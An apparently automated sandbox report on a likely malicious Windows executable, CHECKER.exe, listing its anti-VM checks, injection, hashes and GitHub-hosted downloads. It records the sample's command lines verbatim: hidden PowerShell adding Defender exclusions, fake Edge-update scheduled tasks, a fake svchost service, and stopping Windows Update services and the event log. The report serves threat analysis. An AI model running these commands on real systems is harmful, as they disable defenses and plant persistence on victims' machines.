Analysis Overview
SHA256
38fcbc520ffdd2c818cc0a0cc662db028994647603c5ede66ddb16aa5879ec6c
Threat Level: Likely malicious
The file CHECKER.exe was found to be: Likely malicious.
Malicious Activity Summary
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Creates new service(s)
Stops running service(s)
Looks for VMWare Tools registry key
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
Launches sc.exe
Unsigned PE
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: LoadsDriver
Creates scheduled task(s)
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-07 23:06
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-07 23:06
Reported
2024-04-07 23:09
Platform
win10-20240404-en
Max time kernel
150s
Max time network
143s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Creates new service(s)
Downloads MZ/PE file
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeChecker = "C:\\Users\\Admin\\AppData\\Local\\Temp\\CHECKER.exe" | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4106386276-4127174233-3637007343-1000\Software\Microsoft\Windows\CurrentVersion\Run\EdgeUpdater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\audiodg.exe" | C:\Users\Admin\AppData\Local\Temp\CHECKER.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Setup.evtx | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4516 set thread context of 484 | N/A | C:\Users\Admin\AppData\Local\Temp\audiodg.exe | C:\Windows\system32\dialer.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Users\Admin\AppData\Local\Temp\CHECKER.exe
"C:\Users\Admin\AppData\Local\Temp\CHECKER.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\CHECKER.exe'"
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{5GC93CA01-CJ51-H34A-F4K1-EC0217BD138C}" /TR "C:\Users\Admin\AppData\Local\Temp\CHECKER.exe" /RL HIGHEST /F
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCore{3FD61DA67-EE83-4DEC-A42C-EC0217BD120C}" /TR "C:\Users\Admin\AppData\Local\Temp\audiodg.exe" /RL HIGHEST /F
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\dialer.exe
C:\Windows\system32\dialer.exe
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "svchost"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "svchost" binpath= "C:\ProgramData\RunDLL\taskhostw.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "svchost"
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
\??\c:\windows\system32\sihost.exe
sihost.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.3:443 | github.com | tcp |
| US | 8.8.8.8:53 | 3.121.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.15.104.51.in-addr.arpa | udp |
Files
memory/4448-0-0x0000000000800000-0x0000000000801000-memory.dmp
memory/4448-2-0x0000000000910000-0x0000000001819000-memory.dmp
memory/4448-1-0x0000000000910000-0x0000000001819000-memory.dmp
memory/2296-5-0x0000000006B20000-0x0000000006B56000-memory.dmp
memory/2296-6-0x0000000073B40000-0x000000007422E000-memory.dmp
memory/2296-7-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-8-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-9-0x0000000007190000-0x00000000077B8000-memory.dmp
memory/2296-10-0x0000000007840000-0x0000000007862000-memory.dmp
memory/2296-11-0x00000000079C0000-0x0000000007A26000-memory.dmp
memory/2296-12-0x00000000078E0000-0x0000000007946000-memory.dmp
memory/2296-13-0x0000000007BD0000-0x0000000007F20000-memory.dmp
memory/2296-14-0x0000000007B40000-0x0000000007B5C000-memory.dmp
memory/2296-15-0x0000000008430000-0x000000000847B000-memory.dmp
memory/2296-16-0x0000000008230000-0x00000000082A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wunhuih.utp.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2296-33-0x0000000009390000-0x00000000093C3000-memory.dmp
memory/2296-34-0x0000000070720000-0x000000007076B000-memory.dmp
memory/2296-36-0x0000000009370000-0x000000000938E000-memory.dmp
memory/4448-35-0x0000000000910000-0x0000000001819000-memory.dmp
memory/2296-41-0x000000007E180000-0x000000007E190000-memory.dmp
memory/2296-42-0x00000000094D0000-0x0000000009575000-memory.dmp
memory/2296-43-0x0000000003020000-0x0000000003030000-memory.dmp
memory/2296-44-0x0000000009690000-0x0000000009724000-memory.dmp
memory/2296-237-0x0000000009640000-0x000000000965A000-memory.dmp
memory/2296-242-0x0000000009630000-0x0000000009638000-memory.dmp
memory/2296-258-0x0000000073B40000-0x000000007422E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\audiodg.exe
| MD5 | 047ece692744926c57a5cf74ec892b2a |
| SHA1 | 33c2fb7f524056a12f75bd07854818650ce351a3 |
| SHA256 | 2b46c5609e8aede8c919b9b5d80ac7dadddb288eb7a8ee49a1e8bda0958c81a7 |
| SHA512 | 31f4a8f66d299f858a41b0e9ba8d8539af8e65c30975b66212f3d57b45432b23bd868f4b75b74e7f679c4a0cdf5d728a96a10efe8f605097ec4e16433d385a41 |
memory/588-286-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp
memory/588-285-0x0000016F77FE0000-0x0000016F78002000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | c6e00909a940924dcb736787715d1e55 |
| SHA1 | f6b640080777d173cea6c2d5eed9c2138cac24d1 |
| SHA256 | a00e099601428a75e958f111b61a739c3ca6c6a89919a416a4a6a6a07734f9f8 |
| SHA512 | b97d0014a336baca090a2c23e52ecd4b4d87bad9d20a29ea95d6400eef963a82db6ab8b0c1b407368cf25fb84c7e4312d02b3423600b58b11f6965c81095a416 |
memory/588-287-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-288-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-291-0x0000016F78190000-0x0000016F78206000-memory.dmp
memory/588-304-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-326-0x0000016F77EA0000-0x0000016F77EB0000-memory.dmp
memory/588-331-0x00007FFA9C3B0000-0x00007FFA9CD9C000-memory.dmp
memory/484-332-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-333-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-335-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-334-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-337-0x0000000140000000-0x000000014002B000-memory.dmp
memory/484-339-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp
memory/484-341-0x00007FFAA75B0000-0x00007FFAA765E000-memory.dmp
memory/484-342-0x0000000140000000-0x000000014002B000-memory.dmp
memory/580-345-0x0000018AE20A0000-0x0000018AE20C4000-memory.dmp
memory/640-348-0x000001AC41640000-0x000001AC4166B000-memory.dmp
memory/580-347-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp
memory/640-349-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/580-350-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/640-353-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/640-352-0x000001AC41640000-0x000001AC4166B000-memory.dmp
memory/740-357-0x000001AA35800000-0x000001AA3582B000-memory.dmp
memory/740-358-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1016-361-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp
memory/900-369-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/352-370-0x000001578E020000-0x000001578E04B000-memory.dmp
memory/4448-376-0x0000000000910000-0x0000000001819000-memory.dmp
memory/352-375-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/900-367-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1016-365-0x00007FFAA9915000-0x00007FFAA9916000-memory.dmp
memory/900-364-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/692-377-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1068-386-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp
memory/892-380-0x00000268B60C0000-0x00000268B60EB000-memory.dmp
memory/692-374-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp
memory/892-383-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/352-392-0x000001578E020000-0x000001578E04B000-memory.dmp
memory/1096-393-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp
memory/484-397-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp
memory/1164-395-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1068-390-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/580-389-0x0000018AE20D0000-0x0000018AE20FB000-memory.dmp
memory/1016-399-0x0000017CCE400000-0x0000017CCE42B000-memory.dmp
memory/1096-401-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1164-408-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1208-405-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1164-404-0x00007FFA69900000-0x00007FFA69910000-memory.dmp
memory/1208-400-0x000001F621C80000-0x000001F621CAB000-memory.dmp
memory/1096-413-0x000001FE6C0F0000-0x000001FE6C11B000-memory.dmp
memory/1208-411-0x000001F621C80000-0x000001F621CAB000-memory.dmp
memory/1252-415-0x000002256C9A0000-0x000002256C9CB000-memory.dmp
memory/740-417-0x000001AA35800000-0x000001AA3582B000-memory.dmp
memory/900-418-0x00000127A3960000-0x00000127A398B000-memory.dmp
memory/1068-421-0x000001A57AD60000-0x000001A57AD8B000-memory.dmp
memory/892-420-0x00000268B60C0000-0x00000268B60EB000-memory.dmp
memory/692-419-0x0000022CF2E30000-0x0000022CF2E5B000-memory.dmp
memory/1164-422-0x000001A6A46B0000-0x000001A6A46DB000-memory.dmp
memory/1252-423-0x000002256C9A0000-0x000002256C9CB000-memory.dmp